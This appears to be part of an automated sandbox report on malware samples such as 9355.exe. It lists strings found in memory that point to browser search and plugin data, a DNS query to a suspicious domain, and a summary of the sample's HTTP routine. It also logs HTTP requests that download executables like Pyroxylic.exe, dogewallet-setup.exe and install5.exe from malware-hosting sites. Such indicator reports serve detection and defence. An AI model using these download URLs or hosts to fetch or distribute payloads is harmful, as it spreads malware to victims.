                      Source: 9355.exe, 0000002B.00000002.527734138.00000000034C0000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: 9355.exe, 0000002B.00000002.527734138.00000000034C0000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527138373.00000000032D0000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: 9355.exe, 0000002B.00000002.527734138.00000000034C0000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: 9355.exe, 0000002B.00000002.527734138.00000000034C0000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: svchost.exe, 00000007.00000002.307930219.0000024881613000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                      Source: svchost.exe, 00000004.00000002.551881780.000001F3B863E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000004.00000002.551881780.000001F3B863E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: 9355.exe, 0000002B.00000002.528371871.00000000036E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528144568.0000000003628000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522485023.0000000004468000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527734138.00000000034C0000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527653077.00000000034AA000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522403912.00000000043F7000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528786646.00000000042C2000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522581357.00000000044D9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527420817.00000000033E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528939664.0000000004333000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528455460.00000000036FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522708419.000000000454A000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmp, AI58QQIW.22.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: svchost.exe, 00000004.00000002.551881780.000001F3B863E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: 9355.exe, 00000018.00000002.448461054.0000000003591000.00000004.00000001.sdmp, 9355.exe, 00000018.00000002.448220318.0000000003421000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000000.443464761.0000000000402000.00000040.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: svchost.exe, 00000007.00000003.307401992.0000024881662000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000004.00000002.551881780.000001F3B863E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: 9355.exe, 0000002B.00000002.528371871.00000000036E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528144568.0000000003628000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522485023.0000000004468000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527734138.00000000034C0000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527653077.00000000034AA000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522403912.00000000043F7000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528786646.00000000042C2000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522581357.00000000044D9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527420817.00000000033E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528939664.0000000004333000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528455460.00000000036FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522708419.000000000454A000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmp, AI58QQIW.22.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: svchost.exe, 00000004.00000002.551881780.000001F3B863E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000007.00000003.307492636.000002488165A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000007.00000003.307492636.000002488165A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.308050352.000002488165C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000007.00000003.307401992.0000024881662000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 00000007.00000002.308010980.000002488163D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 00000007.00000003.307492636.000002488165A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.308050352.000002488165C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 00000007.00000003.307333178.0000024881668000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.308081028.000002488166A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 00000007.00000003.307401992.0000024881662000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000007.00000002.308040807.000002488164F000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.307429419.0000024881648000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000007.00000003.307492636.000002488165A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.308050352.000002488165C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000007.00000003.307401992.0000024881662000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 00000007.00000002.308010980.000002488163D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 00000007.00000003.307401992.0000024881662000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 00000007.00000003.307401992.0000024881662000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 00000007.00000003.307401992.0000024881662000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 00000007.00000003.307532881.0000024881640000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 00000007.00000003.307570282.0000024881641000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.308020094.0000024881642000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.307532881.0000024881640000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 00000007.00000003.307401992.0000024881662000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000007.00000003.307492636.000002488165A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.307532881.0000024881640000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.308050352.000002488165C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000014.00000003.386303389.0000024EC8393000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.386703941.0000024EC83B4000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.386033484.0000024EC8371000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmp, AI58QQIW.22.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: 9355.exe, 0000002B.00000002.528371871.00000000036E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528144568.0000000003628000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527734138.00000000034C0000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527653077.00000000034AA000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527420817.00000000033E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528939664.0000000004333000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528455460.00000000036FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522708419.000000000454A000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmp, AI58QQIW.22.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527734138.00000000034C0000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528455460.00000000036FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab4
                      Source: 9355.exe, 0000002B.00000003.522485023.0000000004468000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522403912.00000000043F7000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528786646.00000000042C2000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522581357.00000000044D9000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabX
                      Source: 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmp, AI58QQIW.22.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: svchost.exe, 00000007.00000003.307492636.000002488165A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000007.00000003.307492636.000002488165A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.308050352.000002488165C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000007.00000002.308050352.000002488165C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000007.00000003.307429419.0000024881648000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 00000007.00000003.307401992.0000024881662000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 00000007.00000002.308010980.000002488163D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000007.00000003.285559324.0000024881631000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                      Source: 9355.exe, 0000002B.00000002.528371871.00000000036E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528144568.0000000003628000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522485023.0000000004468000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527734138.00000000034C0000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527653077.00000000034AA000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522403912.00000000043F7000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528786646.00000000042C2000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522581357.00000000044D9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527420817.00000000033E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528939664.0000000004333000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528455460.00000000036FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522708419.000000000454A000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmp, AI58QQIW.22.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: 9355.exe, 0000002B.00000002.528371871.00000000036E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528144568.0000000003628000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522485023.0000000004468000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527734138.00000000034C0000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527653077.00000000034AA000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522403912.00000000043F7000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528786646.00000000042C2000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522581357.00000000044D9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527420817.00000000033E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528939664.0000000004333000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528455460.00000000036FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522708419.000000000454A000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmp, AI58QQIW.22.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                      Source: 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                      Source: 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                      Source: 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                      Source: svchost.exe, 00000007.00000002.308010980.000002488163D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 00000007.00000002.308010980.000002488163D000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.307930219.0000024881613000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000007.00000003.285559324.0000024881631000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000007.00000003.307558841.0000024881645000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.307532881.0000024881640000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000007.00000003.285559324.0000024881631000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 00000007.00000003.285559324.0000024881631000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.307996827.000002488163A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 00000007.00000002.308040807.000002488164F000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.307429419.0000024881648000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 00000014.00000003.386303389.0000024EC8393000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.386703941.0000024EC83B4000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.386033484.0000024EC8371000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000014.00000003.386303389.0000024EC8393000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.386703941.0000024EC83B4000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.386033484.0000024EC8371000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: 9355.exe, 0000002B.00000002.528371871.00000000036E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528144568.0000000003628000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522485023.0000000004468000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527734138.00000000034C0000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527653077.00000000034AA000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522403912.00000000043F7000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528786646.00000000042C2000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522581357.00000000044D9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527420817.00000000033E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528939664.0000000004333000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528455460.00000000036FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522708419.000000000454A000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmp, AI58QQIW.22.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: svchost.exe, 00000014.00000003.388802748.0000024EC83A9000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.388847738.0000024EC8802000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.388784689.0000024EC8388000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.388834736.0000024EC8375000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.388747468.0000024EC83C0000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.388716971.0000024EC83C0000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                      Source: global trafficHTTP traffic detected: GET /attachments/916319571638620172/925647741571452938/Pyroxylic.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /3eHgQQR HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bit.ly
                      Source: global trafficHTTP traffic detected: GET /a/blocked?hash=3eHgQQR&url=https%3A%2F%2Fcdn-131.anonfiles.com%2FP0m5w4j2xc%2Fcac3eb98-1640853984%2F%40Cryptobat9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitly.com
                      Source: global trafficHTTP traffic detected: GET /%28/8V4TRR/q.exe%29.zip HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                      Source: global trafficHTTP traffic detected: GET /u8txqc HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: short.link
                      Source: global trafficHTTP traffic detected: GET /dogewallet-setup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: dodecoin.org
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
                      Source: global trafficHTTP traffic detected: GET /files/5376_1640094939_1074.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
